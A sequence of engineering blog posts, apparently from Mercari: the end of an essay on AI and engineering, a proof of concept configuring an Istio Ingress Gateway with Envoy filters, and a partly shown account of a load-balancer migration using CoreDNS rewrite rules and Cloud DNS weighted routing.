Another aspect to consider is what LLMs like ChatGPT are not good at. LLMs and other deep neural nets are probabilistic machines. Even if they are right 99% of the time, you wouldn’t let one loose writing unchecked code in a system that depends on things working 100% properly. Modern software systems are not designed to work probabilistically; they’re designed to work deterministically. Yes, many distributed systems are designed under the assumption of transient errors, disconnects, and unreliable parts, but that is epistemologically completely different from a system that is designed to work probabilistically from the ground up. Formal verification solves this problem to a degree, but even moderate size programs quickly become unwieldy to verify mathematically, and the Halting Problem does not disappear once “perfect” AI coders start submitting the majority of PRs.

A “programmer” is someone who just writes code. But an “engineer” solves problems and builds things. Perhaps the medium changes, but the story of computer science since the beginning has been one of engineers pushing the limits of current technology in order to develop better ways of executing computations. Eighty years ago, nascent computer scientists were coding by manipulating physical gears to perform complex calculations like those from the Enigma machine, or changing configurations of plugs and switches to program the ENIAC. Modern computers followed soon after, and before you know it, coding was entering binary into punch cards. Assembly came next, followed soon after by high level languages such as Fortran, COBOL, BASIC, and finally C in 1972. At each step, engineers have taken the existing solution and simplified it to make their jobs easier and to increase the scope of what they could build. Having a digital assistant that can understand code is yet another force multiplier for engineers. But it will take time to get used to the new world of co-programming with AIs, and a lot of egos are at risk of being hurt in the transition. There is no indication that this is the “final stage” for engineering. Rather, a more likely scenario is that we engineers are able to build ever more powerful machines because we’ve abstracted away some of the complexity of the previous generation of tools, systems, and languages.

Additionally, as AIs take more of the mundane work off our plate, the human aspects of the job become ever more important. Writing code is just one part of the engineer’s job. Figuring out what code to write is far more important. What questions need answering? What can we remove? How does my project fit in with other products and projects across the company? These questions often rely on human relationships in order to decide and solve, because not everything can or should be dispassionately optimized by a machine. Talk to your coworkers. Learn to discuss and defend your ideas in design docs, prose, and speaking. Develop relationships with engineers and non-engineers alike, because it is the human relationships that are the lifeblood of a company just as much, if not more, than the raw outputs produced by its workers.

Finally, in the face of new technologies, some humility is always prudent. We simply don’t know what the future will look like, and it is incredibly difficult for humans to comprehend exponential technology curves. The best way to prepare for the future is to keep learning about the new while always focusing on the engineering fundamentals that never change: Engineers solve problems and build things. We use tools to do so, and we make those tools work for us in order to multiply our abilities. We build abstractions in order to hide complexity, but as soon as a new complexity layer arises, we build yet another abstraction layer on top of it, with no end in sight.

Engineers are going to keep engineering, and I can’t wait to build the future with you.

Exploring the possibility of Istio Ingress Gateway

Wed, 14 Dec 2022 17:04:40 GMT

Introduction

At Mercari, we are using Istio for east-west traffic but we have not used it for north-south traffic. This year, we created a Proof of Concept (PoC) of Istio Ingress Gateway to validate whether it fitted our north-south requirements. Especially, we confirmed the Istio Ingress Gateway and our requirements have a parity. That’s because since a different service already addresses north-south traffic if they don’t have the parity, it’s difficult to migrate.

What’s the Istio Ingress Gateway

The Istio Ingress Gateway is a standalone Istio proxy deployed at the edge of the mesh. It allows Istio features such as traffic management to the traffic entering the Kubernetes cluster.

There are two ways to configure the Istio Ingress Gateway:

Istio Custom Resources (CR)
Kubernetes Gateway API

Regarding the Istio CR, we use the Istio Gateway CR and Istio VirtualService CR. The Gateway CR is used to configure the exposed ports and TLS configurations and so on. The VirtualSevice CR is used to configure the route configuration such as destination service, traffic shifting, and so on.

Concerning the Kubernetes Gateway API, Kubernetes Gateway API is an open source standard for service networking in Kubernetes. Its purpose is to provide an evolution of the Ingress API. By using CRs of Kubernetes Gateway API, we can configure Istio Ingress Gateway, Google Cloud Load Balancing, etc. If you want to know about other implementations of this API, please refer to the official documentation. In the Istio Ingress Gateway case, it’s currently in alpha phase, so if you want to use it, please be careful with backward compatibility.

Since we already use Istio CRs for east-west traffic, we preferred to use Istio CRs for the Istio Ingress Gateway PoC.

Feature requirements of our north-south traffic

The following figure shows our typical north-south system situation. When the client makes a request to our system, the request reaches Fastly first then it goes to Google Cloud Load Balancing and goes to our Kubernetes cluster. In the Kubernetes Cluster, the Gateway service which is an in-house service written by Go receives the request first. The Gateway service communicates with an in-house authentication service to verify client requests and proxies them to backend services.
The important thing is the Gateway service doesn’t have application-specific logic instead it does general concerns such as Access Control, Client Authentication, Transcoding request/response, and so on. The application-specific logic is addressed by each backend service. By separating responsibilities in this way, each service owner can focus on developing own their service without blocking other services.

In the PoC, we confirmed that the Istio Ingress Gateway can realize more than 30 features that the current Gateway service has but it’s difficult to write about all the features in this article. Therefore, I picked up four features:

Gzip compression
gRPC transcoding
Direct response
Integrate with internal authentication service and request hedging

Let’s check the details of each feature.

Gzip compression

The Gateway service does Gzip compression. The purpose is to reduce the body size so the response can be returned to the client more quickly. As you may know, Fastly can do the same thing butthere are a few cases in which some endpoints don’t use Fastly. And also even if all endpoints are behind Fastly, we can reduce the egress cost by reducing the body size. Therefore, regardless of the Fastly, we need this feature in the Gateway service.

gRPC transcoding

In Mercari, many services are built with the gRPC server. For east-west communication, it’s useful because the caller service can easily get request/response payload from the Protocol buffers definition. For north-south communication, clients are the web browser, iOS, and Android, making it hard to enforce using gRPC requests. Since it’s not realistic that all services implement both gRPC endpoints and HTTP endpoints, the Gateway service transcodes HTTP requests into gRPC requests and transcodes gRPC responses to HTTP responses to ensure the interoperability of our clients and servers.

Direct Response

There are use cases which the Gateway service returns the response directly to the client without proxying the request to backend services. One of the use cases is access control such as IP based or Header based to protect backend services from malicious clients. In this case, the Gateway service does not proxy the request to the backend service, so it needs to return the response instead.

Integrate with in-house authentication service and request hedging

One of the important features is to communicate with an in-house authentication service for authenticating client requests because our service provides value tied to customers such as buying/selling/paying. Therefore, this process of associating a specific customer with a request is important.

Stability and performance are also important. Regarding stability, the communication between the Gateway service and in-house authentication service is over the network. Sometimes requests are delayed or dropped temporarily by the network issue. We can improve it by combining timeout and retries. As a result, even if the network is temporarily unstable, the request may be successful after the retry, leading to more stability but how about the performance? By using timeout and retries, it takes more time than usual to get the response, resulting in a latency increase.

In order to achieve both stability and performance, we have adopted the use of hedged requests. With hedged requests, the client first sends one request as usual, then falls back on sending a secondary request after some brief delay. Once the client gets the first response, it cancels the remaining outstanding requests . As a con, if the interval of subsequent requests is short, it adds additional loads to the destination service. Therefore, the appropriate interval is required. “The Tail at Scale” says If we set the 95th-percentile expected latency of requests in the delayed time for secondary requests, it substantially shortens the latency tail and limits the additional load to approximately 5%. In fact, in Mercari, less than 1% sent more than secondary requests, so the additional load is not adding that much more.

How to implement each feature requirement

Istio 1.12.5 (Envoy 1.20.3) was used in implementations.

Gzip compression

Istio doesn’t provide Gzip compression feature natively but Envoy supports it with the Compressor HTTP filter. By Istio EnvoyFilter CR, we can use Envoy native filters in Istio. If we apply the manifest below, the Istio Ingress Gateway compresses the response if request header has Accept-Encoding: gzip and response body size is over the 20 bytes and context_type is “text/plan”, “text/html”, “text/css” or “application/json“.

apiVersion: networking.istio.io/v1alpha3
kind: EnvoyFilter
metadata:
  name: gzip
spec:
  ~~~
  configPatches:
  - applyTo: HTTP_FILTER
    ~~~
    patch:
      operation: INSERT_FIRST
      value:
        name: envoy.filters.http.compressor
        typed_config:
          '@type': type.googleapis.com/envoy.extensions.filters.http.compressor.v3.Compressor
          compressor_library:
            name: for_response
            typed_config:
              '@type': type.googleapis.com/envoy.extensions.compression.gzip.compressor.v3.Gzip
              compression_level: "COMPRESSION_LEVEL_6"
          content_length: 20
          content_type:
            - "text/plain"
            - "text/html"
            - "text/css"
            - "application/json"

gRPC transcoding

Istio doesn’t provide gRPC transcoding feature natively but Envoy supports it with the gRPC-JSON transcoder HTTP filter. When we use the Gzip compression, we just created one EnvoyFilter resource. But in order to work the gRPC-JSON transcoder filter, we need more steps.

Let’s say we have the following proto file with the helloworld package. This package includes the Greeter service. The Greeter service has SayHello RPC, in which the request payload is HelloRequest and the response payload is HelloResponse. For defining the transcoding of the gRPC-JSON transcoder filter, we use annotations of googleapis/googleapis repository. In the case below, if the request path is /say and the the method is POST, the request/response will be converted to SayHello RPC.

syntax = "proto3";

package helloworld;

import "google/api/annotations.proto";

service Greeter {
  rpc SayHello(HelloRequest) returns (HelloResponse) {
    option (google.api.http) = {
      post: "/say"
    };
  }
}

message HelloRequest {
  string name = 1;
}

message HelloResponse {
  string message = 1;
}

The gRPC-JSON transcoder HTTP filter can’t read a proto file directly. Therefore, we need to convert it into the proto descriptor file. For example, if we convert the proto file above, we execute the following commands.

$ git clone https://github.com/googleapis/googleapis 
$ protoc -I./googleapis --include_imports --descriptor_set_out=proto-descriptor.pb helloworld.proto

The next step is to pass the proto descriptor file to Istio. The gRPC-JSON transcoder HTTP filter provides two ways:

proto_descriptor: Specifies the file path of the proto descriptor
proto_descriptor_bin: Specifies the base64 encoded proto descriptor

Regarding the proto_descriptor, we need to pass the file to the Istio-proxy container. If we use Istio-proxy’s official docker image, we need to consider how to pass the file to the container. One way is to pass the file through volume (e.g. ConfigMap). Concerning the proto_descriptor_bin, we encode the proto descriptor by Base64 and add the encoded one to the filter configuration. For keeping simple, we chose proto_descriptor_bin in the PoC.

First of all, we get Base64 encoded proto descriptor (e.g. cat proto-descriptor.pb | base64). Then we create the manifest like below. The encoded proto descriptor file is specified in the proto_descriptor_bin field and the exposed service is defined in the services field using the package_name.service_name format.

apiVersion: networking.istio.io/v1alpha3
kind: EnvoyFilter
metadata:
  name: grpc-json-transcoder
spec:
  workloadSelector:
    labels:
      istio: ingressgateway
  configPatches:
  - applyTo: HTTP_FILTER
    match:
      context: GATEWAY
      listener:
        filterChain:
          filter:
            name: envoy.filters.network.http_connection_manager
            subFilter:
              name: envoy.filters.http.router
    patch:
      operation: INSERT_BEFORE
      value:
        name: envoy.filters.http.grpc_json_transcoder
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.http.grpc_json_transcoder.v3.GrpcJsonTranscoder
          services:
          - helloworld.Greeter
          proto_descriptor_bin: <base64 encoded proto descriptor>

The final step is to configure the route using VirtualService CR. For the route of gRPC transcoding, we need to register the HTTP path and specify the gRPC service in the destination field like the manifest below. By applying it, Istio Ingress Gateway knows if the request path is /say, and it should be proxied to grpc-server.default.svc.cluster.local:8080. The gRPC-JSON transcoder HTTP filter is an HTTP filter. Therefore, the request is converted into a gRPC request before being proxied to the destination service. If you’re not familiar with the lifecycle of an Envoy request, “Life of a Request” will be helpful.

apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: helloworld
spec:
  ~~
  gateways:
  - istioingressgateway 
  http:
  - name: "grpc-transcoding-route"
    match:
    - port: 443
      uri:
        exact: /say
    route:
    - destination:
        host: grpc-server.default.svc.cluster.local
        port:
          number: 8080

Direct Response

From Istio 1.15, it started supporting direct response by using VirtualService CR (ref: HTTPDirectResponse). If conditions are simple (e.g. the header has a specific value), this feature is enough. But if the condition is complicated (e.g. certain conditions are met by extracting and comparing values from multiple headers), it’s difficult to use it.

To validate complicated conditions, we tried to use Wasm. Before looking at how to use Wasm in Istio, let’s briefly look back at the history of Istio and Wasm. Wasm began to be officially used from Istio 1.5. From Istio 1.9, Istio started supporting an experimental feature to fetch the Wasm module from remote repositories (HTTP) and also enabled the reload module without restarting Envoy. At that time, developers needed to use EnvoyFilter CR to use the Wasm filter and to put their own Wasm module in a location reachable via HTTP, which is not trivial. However, from Istio 1.12, the WasmPlugin CR became the first-class API, while OCI Images were supported. As a result, developers no longer need to maintain the HTTP endpoint. Instead, they just push the Docker image compatible with OCI in image repositories, such as Docker Hub, ECR, GCR, and so on.

From Istio 1.12, Wasm has become more accessible but how to implement it? First of all, you need to making a Wasm module followingthe Proxy-Wasm specification which is an Application Binary Interface. If the Wasm module doesn’t meet that specification, it can’t communicate with Envoy. In order to meet this requirement, it would be better to use SDKs. If we use them, even if we don’t have much knowledge about Proxy-Wasm, we can create a Wasm module. In the PoC, we used the Go (TinyGo) SDK (tetratelabs/proxy-wasm-go-sdk) because the purpose of PoC is that confirms the practicality of Wasm, therefore we chosen a language that we can use smoothly.

Let’s look at a real Wasm example. To keep the requirements simple and easy to understand, I created a Wasm module that meets the following requirements:

If the request headers have x-foo: 1 and x-bar: 1, that request will be proxied to the destination service
Otherwise, a static response will be returned to the client with 400 status code

All the code implemented this time is stored in the following repository.
https://github.com/hatappi/direct-response-proxy-wasm

As written earlier, from Istio 1.12, we can use WasmPlugin CR. By applying the following manifest, you can get the direct response according to HTTP request headers.

apiVersion: extensions.istio.io/v1alpha1
kind: WasmPlugin
metadata:
  name: direct-response
spec:
  ~~~
  url: oci://ghcr.io/hatappi/direct-response-proxy-wasm/direct-response-oci:v0.0.1
  imagePullPolicy: IfNotPresent
  pluginConfig:
    message: “This is direct response!”

Integrate with authentication service and request hedging

Regarding the integration with in-house authentication service, since Istio provides the External Authorization (ext_authz) feature natively, we can use it. The point to note is that when the authorization server is the gRPC server, it is necessary to implement the Check RPC specified by Envoy.

Concerning the request hedging, there is no option to configure request hedging in both gRPC and HTTP. This is the same for Envoy. Even if we check the Envoy External Authentication filter (ext_authz filter) options, none are related to request hedging.
Actually, Envoy supports it with a hedge policy combined with a retry policy but the hedge policy can only be used in the HTTP router filter. The HTTP router filter is used in the Listener subsystem which handles downstream requests, and the router filter bridges the Listener and Cluster subsystems which handle the upstream connection. Sadly, it is not used for the external authentication filter. Therefore, In order to support request hedging with the ext_authz filter, we came up with two options:

Sidecar pattern
Loopback way

Regarding the sidecar pattern, this pattern deploys an additional container with istio-proxy. This container hedges requests to authorization service. If we specify that container for ext_authz, since the communication between istio-proxy and sidecar container is in the localhost, we can ignore unstabilized networks.

With the loopback way, the External Authentication filter makes a request to another listener having the authorization server routing information via localhost. Since Envoy supports hedge policy in the HTTP router filter, we can use hedge policy on those requests. The following figure shows how it works.

We can easily imagine implementing a sidecar pattern but we were not sure whether we can take the loopback option or not. Therefore, in PoC, we tried it. In order to realize the figure above, there are three steps:

Create VirtualHost which has hedge_policy
Register cluster and listener
Configure External Authorization

1. Create VirtualHost which has hedge_policy

Since Istio doesn’t support configuring hedge_policy natively, we configured VirtualHost which is the top-level element in the routing configuration of Envoy by using EnvoyFilter CR. The following manifests register a listener with TCP port 5000. In the routes field, the ext_authz request path is registered. The cluster can be retrieved from Envoy config (e.g. with the ‘istioctl pc cluster’ command). The hedge and retry policies are defined according to the official documents. In the following manifest, the requests will be made every 0.5 seconds for up to 3 requests. There is also a risk that the process will loop indefinitely if the authorization feature is enabled for this route, so disabling extensions.filters.http.ext_authz.v3.ExtAuthzPerRoute.

apiVersion: networking.istio.io/v1alpha3
kind: EnvoyFilter
metadata:
  name: ext-authz-with-request-hedging
spec:
  ~~~
  configPatches:
    - applyTo: VIRTUAL_HOST
      ~~~ 
      patch:
        operation: MERGE
        value:
          # To prevent loop
          typed_per_filter_config:
            envoy.filters.http.ext_authz:
              "@type": type.googleapis.com/envoy.extensions.filters.http.ext_authz.v3.ExtAuthzPerRoute
              disabled: true
          routes:
            - match:
                prefix: "/envoy.service.auth.v3.Authorization/Check"
              route:
                cluster: [cluster of authorization service]
          retry_policy:
            retry_on: "connect-failure"
            num_retries: 3
            per_try_timeout: "0.5s"
            retry_host_predicate:
            - name: envoy.retry_host_predicates.previous_hosts
            host_selection_retry_max_attempts: 3
          hedge_policy:
            hedge_on_per_try_timeout: true

2. Register cluster and listener

Since the VirtualHost above is added manually, we need to register the cluster and the listener manually.

In order to configure the cluster, we used Istio ServiceEntry CR. The following ServiceEntry registers the loopback-gateway.local cluster which points to 0.0.0.0:5000. After applying it, you can check the created cluster using this istioctl command: istioctl pc cluster [pod name of Istio Ingress Gateway] --fqdn loopback-gateway.local

apiVersion: networking.istio.io/v1alpha3
kind: ServiceEntry
metadata:
  name: loopback-gateway-local
spec:
  hosts:
  - loopback-gateway.local
  ports:
  - number: 5000
    name: grpc
    protocol: GRPC
  location: MESH_INTERNAL
  resolution: STATIC
  endpoints:
  - address: 0.0.0.0

The next step is to register a listener. In Istio Ingress Gateway, we can configure the listener using Gateway CR. The following manifest registers a new listener which exposes the TCP 5000 port with the ‘loopback-gateway.local.’ host.

apiVersion: networking.istio.io/v1alpha3
kind: Gateway
metadata:
  name: loopback-gateway
spec:
  ~~~
  servers:
  - port:
      number: 5000
      name: grpc
      protocol: HTTP
    hosts:
    - "loopback-gateway.local"

3. Configure External Authorization

Now, Istio Ingress Gateway can reach its own listener using loopback-gateway.local. We set that to [envoyExtAuthzGrpc` of MeshConfig](https://istio.io/latest/docs/reference/config/istio.mesh.v1alpha1/#MeshConfig-ExtensionProvider-EnvoyExternalAuthorizationGrpcProvider).

  meshConfig:
    ~~~
    extensionProviders:
    - name: "grpc"
      envoyExtAuthzGrpc:
        service: "loopback-gateway.local"
        port: "5000"

Finally, we created AuthorizationPolicy CR to use ext_authz in the Istio Ingress Gateway. A crucial part is excluding the loopback CIDR otherwise, the loopback request will fail because the request also attempts authorization.

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: ext-authz
spec:
  ~~~
  action: CUSTOM
  provider:
    name: grpc
  rules:
  - from:
    - source:
        notRemoteIpBlocks:
          - 127.0.0.0/8    # loopback CIDR

Conclusion

We confirmed that Istio met the requirement parity with our Gateway Service by creating a PoC. If Istio does not provide the functionality, but Envoy does, it can be achieved by using EnvoyFilter CR. It’s powerful but we need to use it carefully. Otherwise, it breaks the entire mesh by an incorrect configuration. When we provide these features to developers, it would be great to provide appropriate abstractions and guardrails to them. Fortunately, we already have those foundations. For abstraction, we can use CUE (ref: Kubernetes Configuration Management with CUE). For guardrails, we can use Open Policy Agent. It would be great if these could be used to create an environment that allows developers to focus on the application settings and not the Istio settings!

Tomorrow’s article will be by masartz. Look forward to it!

Seamless critical traffic migration with CoreDNS request rewrite feature

Tue, 13 Dec 2022 18:40:20 GMT

Hi everyone, are you enjoying the Advent Calendar so far? This is the 13th post of the Mercari Advent Calendar and Christmas is approaching at a crazy speed, isn’t it?

My name is Raphael Fraysse, Engineering Manager for the Network team; please check out our team introduction when you get time!

Introduction

I will explain today how we managed to migrate ‘fast-secure-lb’, an Nginx-based critical network infrastructure component, from on-premises to our cloud-based platform without any client-side action or downtime. This approach saved us hundreds of hours by making a significant migration seamless for our developers. Sounds too good to be true? Let us show you how it happened!

Migration context

Here at Mercari, our infrastructure was entirely running in a private datacenter until 2018. In 2018, we embraced the microservices concept to accelerate our business growth and gradually offload our monolithic application into a microservices cloud computing platform (Google Cloud Platform).

Since then, we have been conducting the microservices migration between our DCs and our platform built upon Google Kubernetes Engine (GKE). During the migration, the newly created platform and its microservices needed to constantly communicate with the DC monolithic service via a secure path as traffic flows over the Internet.

The primary component responsible for ensuring the secure path between them was “fast-secure-lb”, a load balancer based on Nginx terminating the TLS connections initiated by our microservices running in GKE.

As you can see, this was a critical component of our infrastructure as it controlled all north-south traffic between microservices and the monolith.

In early 2022, we started migrating this critical component to GKE to reduce our DCs’ footprint gradually.

Lift-and-shift

To minimize the migration cost, we adopted a lift-and-shift approach to containerizing the Nginx proxy in GKE. We focused on porting the existing solution, Nginx, directly into the cloud environment by transforming the Ansible-managed configuration from our bare metal servers in the datacenter to a Kubernetes Deployment based on the same containerized Nginx build.

As Nginx and its configuration are portable, it was easy to achieve. We could easily scale it out according to the incoming load in Kubernetes and compensate for the performance loss compared with bare metal servers.

From north-south to east-west and its benefits

Note: From this part of the article, we will use the present tense to get in immersion together with how to perform the migration.

As fast-secure-lb is running in our datacenter, it is considered external to our cloud platform, so the traffic is treated as north-south. Crossing the boundaries over the Internet requires us to use a public DNS domain to call it from GKE. To achieve this, all clients running in the GKE platform called fast-secure-lb using a DNS A record hosted in a public zone in Amazon Route 53: ‘public-mercari.jp.’ The DNS resolves to the public IP addresses of our fast-secure-lb servers in the datacenter.

Below is a simplified breakdown of the DNS hierarchy related to fast-secure-lb:

Under the ‘public-mercari.jp’ DNS zone, we have one DNS A record ‘fast-secure-lb.public-mercari.jp’ exposing 3 IP addresses corresponding to each fast-secure-lb server in the datacenter.

By migrating fast-secure-lb into GKE, the client services do not have to call it over the Internet via north-south communication anymore. Instead, they can directly call it via east-west communication, internally to the platform, bringing many benefits along:

Latency optimization by physical distance and network hop decrease
- Data path for a request before migration
  - Services on GKE →Internet → Datacenter fast-secure-lb servers
- After migration, requests stay in the same VPC network
  - Services on GKE→ Fast-secure-lb on GKE
Security strengthening
- DNS exposure is internal only, avoiding DNS spoofing or discovery from malicious actors
- Traffic stays within the same internal network, protecting it from external threats
Reliability improvement
- DNS data path
  - Before migration:
    - Services on GKE → Cluster DNS resolver (kube-dns) → Cloud DNS → Route 53
  - After migration:
    - Services on GKE → Node local metadata server *Note, this will change later in this article
Certificate cost reduction
- By switching to self-signed internal certificates, we no longer need to pay for public certificates.

GKE DNS internals

Let’s dive into how DNS resolution works in GKE and GCP to understand how we could call fast-secure-lb using an internal DNS A record.

Source: https://cloud.google.com/kubernetes-engine/docs/how-to/kube-dns

In GKE, DNS resolution is by default provided by the cluster DNS agent, in our case, kube-dns (as we don’t use CoreDNS, which is the new default since Kubernetes 1.13)

When queried, kube-dns has two behaviours, one for domains internal to the cluster it has authority upon (i.e. ‘*.cluster.local’) and one for everything else. For the cluster’s internal domain, kube-dns will check the records directly in its registry. It will call the GCE (Google Compute Engine) node local metadata server for other domains, which requests Cloud DNS.

In Kubernetes, when creating Services, an A record pointing to their virtual IP is automatically generated and shared to kube-dns. This is the simplest way to call fast-secure-lb from services within the cluster from a technical perspective but it requires developers to change their service configuration with this new DNS A record. We’ll see in the next section how it is a problem for us.

Core problem

We know that client configuration changes take a very long time to complete, especially in our case where we had about 50+ services using fast-secure-lb, with their own priority and business focus. It is very costly for the services developers to perform migrations requiring their action and the platform team to handle all services migration.

Ideally, we don’t want to impact the developers at all while keeping the migration schedule and limiting our costs.

Does such a solution exist? This is the kind of platform engineer’s pinnacle migration: transparent, safe, easy to perform and seamless for users that we’re aiming at!

Let’s formulate our requirements for the migration to stay laser-focused on appropriate solutions:

Gradual DNS migration without client action
No impact on existing DNS resolution
DNS resolution and data path must be internal (within the same VPC network)

Formulating (ideal) solutions

We know that fulfilling all requirements forces us to:

Keeping the same domain configuration on the client services.
Refrain from reusing the same public domain in Route 53, as we cannot host internal A records from GCP there.
Using an internal DNS A record.

These are almost contradictory requirements, as not changing the domain name endpoint while changing the destination domain is impossible if we stick to the standards of RFC 1035. RFC 6672’s DNAME resource record also requires us to reuse the Route 53 record.

We should think more generally of DNS as a simple application protocol and map approaches from other application protocols, such as HTTP, in altering requests.

In the HTTP protocol, it is relatively standard to use URL (Universal Resource Locator) rewrites for various reasons.

What if we could do the same thing with DNS? This is not recommended for public DNS communication or critical systems because of the added complexity, maintenance cost and potential compatibility issues with third-party DNS servers. Nevertheless, this can be an option in a closed, simple and controlled environment.

We could achieve this with an L7 proxy, say Envoy, redirecting client traffic when matching a destination, our Route 53 DNS endpoint. It is tricky to set it up as we need to have Envoy in the data path of all services, either as a sidecar (service mesh approach) or egress gateway approach, both of which need to be more seamless to clients. It is also not DNS protocol native, as occurring on the HTTP layer.

Here enters the savior, CoreDNS

Fortunately, the Kubernetes ecosystem is blessed to have a great piece of DNS software: CoreDNS (yes, the default DNS server we talked about earlier!)

CoreDNS has so many plugins that it is hard to understand or keep track of everything, but there was a feature that caught our attention: the rewrite plugin.

This is a (DNS protocol native!) request/response rewrite engine that is pretty versatile and able to perform complex rewrites based on regex as well as simple ones. It is so versatile that it’s a little scary, and we know that we avoid complex logic when possible to prevent performance bottlenecks in networking.

We didn’t thoroughly test the performance impact of a simple rewrite vs a complex regex-based rewrite, but other past experiences with HTTP convinced us to avoid using it on a critical path. (Remember, though, YMMV)

Thankfully, we don’t need anything more than a simple request rewrite to achieve our goal!

What we want to do is, whenever a request from a client to resolve the ‘fast-secure-lb.public-mercari.jp’ domain name goes through CoreDNS, we want it to rewrite the request to ‘fast-secure-lb.fast-secure-lb-namespace.svc.cluster.local’.

It is as simple as writing this line in CoreDNS’s Corefile:

rewrite name fast-secure-lb.public-mercari.jp fast-secure-lb.fast-secure-lb-namespace.svc.cluster.local

Great! Now, we know how to get our new fast-secure-lb called without changing the client configuration! We can also call it using an internal DNS record. However, we still need to figure out two more things:

How do we get CoreDNS to be received all client services DNS requests?
How do we perform a gradual rollout to ensure we don’t face issues during migration?

Hijacking the cluster DNS with CoreDNS

This section only applies to our case, where kube-dns is the cluster DNS server. If you are using newer GKE clusters with CoreDNS as the default DNS server, you won’t have any issues, so feel free to skip this section.

Kube-dns gets all DNS requests from the cluster pods thanks to the dnsPolicy in the workload manifest set to ‘clusterFirst’ (the default in Kubernetes, although a ‘Default’ dnsPolicy also exists). Unfortunately, kube-dns cannot do a fraction of what CoreDNS does, so we need to find a way to get DNS traffic flowing to CoreDNS.

Happily, kube-dns has a feature called ‘stub domains’ (RFC 1123), allowing us to specify alternative nameservers for defined DNS domains and forward the DNS resolution to them.

By using this ConfigMap, we make kube-dns a stub resolver for the ‘public-mercari.jp’ domain, forwarding the DNS resolution to the CoreDNS Service IP address, which is then sent to the CoreDNS pods in a round-robin fashion:

apiVersion: v1
kind: ConfigMap
metadata:
  name: kube-dns
  namespace: kube-system
  labels:
    addonmanager.kubernetes.io/mode: EnsureExists
data:
  stubDomains: |
    {"public-mercari.jp" : ["COREDNS_IP_ADDRESS"]}

Once applied, it will immediately take effect. Thus, CoreDNS needs to be running and battle-tested to serve the amount of DNS traffic flowing to the entire ‘public-mercari.jp’ domain. Stub domains are an “opt-in, opt-out” feature, so it needs to be planned carefully, as you wouldn’t like your production queries to be impacted by the CoreDNS Deployment.

On the other hand, it is cheaper to use this option than migrating kube-dns to CoreDNS as the sole DNS server for the GKE cluster. CoreDNS, as a standalone Deployment, will only get this domain traffic which should be small compared to the cluster’s internal DNS traffic.

Kubernetes DNS limitations

Now that we have our CoreDNS ready to process the DNS traffic and rewrite it. Let’s think about how to roll it out in a safe way.

First, here is what your CoreDNS Corefile could look like:

apiVersion: v1

kind: ConfigMap

metadata:

  name: coredns-standalone

  namespace: kube-system

data:

  Corefile: |

    .:53 {
        errors
        health {
            lameduck 5s
        }
        log . {combined} {
            class denial error
        }
        ready
        rewrite _name fast-secure-lb.public-mercari.jp fast-secure-lb.fast-secure-lb-namespace.svc.cluster.local_
        forward . KUBE_DNS_SERVICE_IP
        prometheus :9153
        cache 30
        loop
        reload
        loadbalance
    }

Attention: The above zone logic will apply to any DNS request flowing through CoreDNS, so it would only work if the same logic applies to all stub domains configured with CoreDNS as the forwarded DNS server. You should add zone blocks if you use multiple stub domains and need different configurations per zone (= domain).

When using kube-dns as the cluster DNS server, an issue is that the ‘cluster.local’ domain resolution will fall back to kube-dns, and the DNS data path will look like the following, ending up doubling the DNS traffic for ‘fast-secure-lb.public-mercari.jp’ in kube-dns. Fortunately, caching the DNS results in CoreDNS would mitigate this.

client pod → kube-dns → CoreDNS → kube-dns → client pod

With this approach, once we apply the CoreDNS configuration it will replace the Route 53 DNS records returned to the clients with the fast-secure-lb GKE Service IP, leading to a sudden complete shift in traffic. This is dangerous as we cannot test the migration properly. If we make a mistake, our entire production is down without any breaks so it is not reasonable to go with the current approach.

Gradual migration with Cloud DNS

Let’s think about how we could take a better approach to gradually perform the migration and test ramp-up phases while eventually being able to roll back without a significant impact in case of migration issues.

Gradual migrations are done using weighted routing, with a proxy capable of controlling the amount of traffic between different endpoints based on a weight configuration. Having several phases, let’s say 1%, 10%, 25%, 50%, and then 100%, helps identify potential issues early in the migration process. As we modify the DNS resolution, we can only have the weighted routing happen at that layer. Route 53 can do that, but we don’t use it for the new domain. CoreDNS cannot do that, leaving us with one option: using GCP’s Cloud DNS.

Cloud DNS supports the weight round-robin DNS policy, so if we use it for our DNS record, we should be able to get that safe migration!

The issue is that only kube-dns/CoreDNS knows our ‘fast-secure-lb.fast-secure-lb-namespace.svc.cluster.local’ record, so we cannot have it in Cloud DNS…

Therefore, we need to give up on using the fast-secure-lb Service DNS record and find a way to use Cloud DNS instead. Let’s define an internal zone in Cloud DNS within the same VPC network as our GKE cluster.

We’ll create the ‘internal.public-mercari.jp’ sub-domain to keep consistency with our external domain so that we won’t break our domain parity unnecessarily for our production traffic.

When calling our datacenter endpoint, we use the ‘public-mercari.jp’ domain hosted by Route 53. Route 53 is the zone’s SOA (Start of Authority) and primary nameserver. Suppose we try to add new records from another DNS server (i.e. Cloud DNS) for this domain. In that case, we will get rejected because Cloud DNS is not the primary nameserver unless we delegate authority. We don’t want to do it, as the domain is still to be managed by Route 53.

Source: https://ns1.com/resources/split-horizon-or-multiview-dns

Split-horizon DNS is a good feature in terms of security by allowing us to reuse the same domain name across internal and external scopes. Sadly, GCP and AWS do not provide interoperability on split-horizon as both internal and external zones must be hosted in the same cloud provider, so we cannot use it either.

Instead, we can create a new sub-domain part of the same domain and manage it as a private zone. Its visibility will be limited to the VPC network it is built into and will not collide with the parent domain.

Below is a breakdown of the sub-domain of ‘public-mercari.jp’: ‘private.public-mercari.jp’

It has one DNS A record, ‘fast-secure-lb.private.public-mercari.jp’ with two sets of RRDATA. In each set, weight is defined alongside a list of IP addresses, describing the traffic control status of both sets behind the same DNS A record.

With this, we can use the weighted round-robin policy between both instances of fast-secure-lb.

Our DNS A record looks like the following:

Let’s reflect it in our CoreDNS configuration by modifying the rewrite statement:

apiVersion: v1
kind: ConfigMap
metadata:
  name: coredns-standalone
  namespace: kube-system
data:
  Corefile: |
    .:53 {
        errors
        health {
            lameduck 5s
        }
        log . {combined} {
            class denial error
        }
        ready
        **rewrite _name fast-secure-lb.public-mercari.jp fast-secure-lb.private.public-mercari.jp_**
        **forward . 169.254.169.254**
        prometheus :9153
        cache 30
        loop
        reload
        loadbalance
    }

We want to call the local metadata server because it knows the Cloud DNS information for our internal DNS hosted zone.

With this applied, we can safely confirm that fast-secure-lb DC is reachable despite not changing the endpoint on the client side when using KubeDNS as the resolver:

dnstools# dig @KUBE_DNS_SERVICE_IP fast-secure-lb.public-mercari.jp

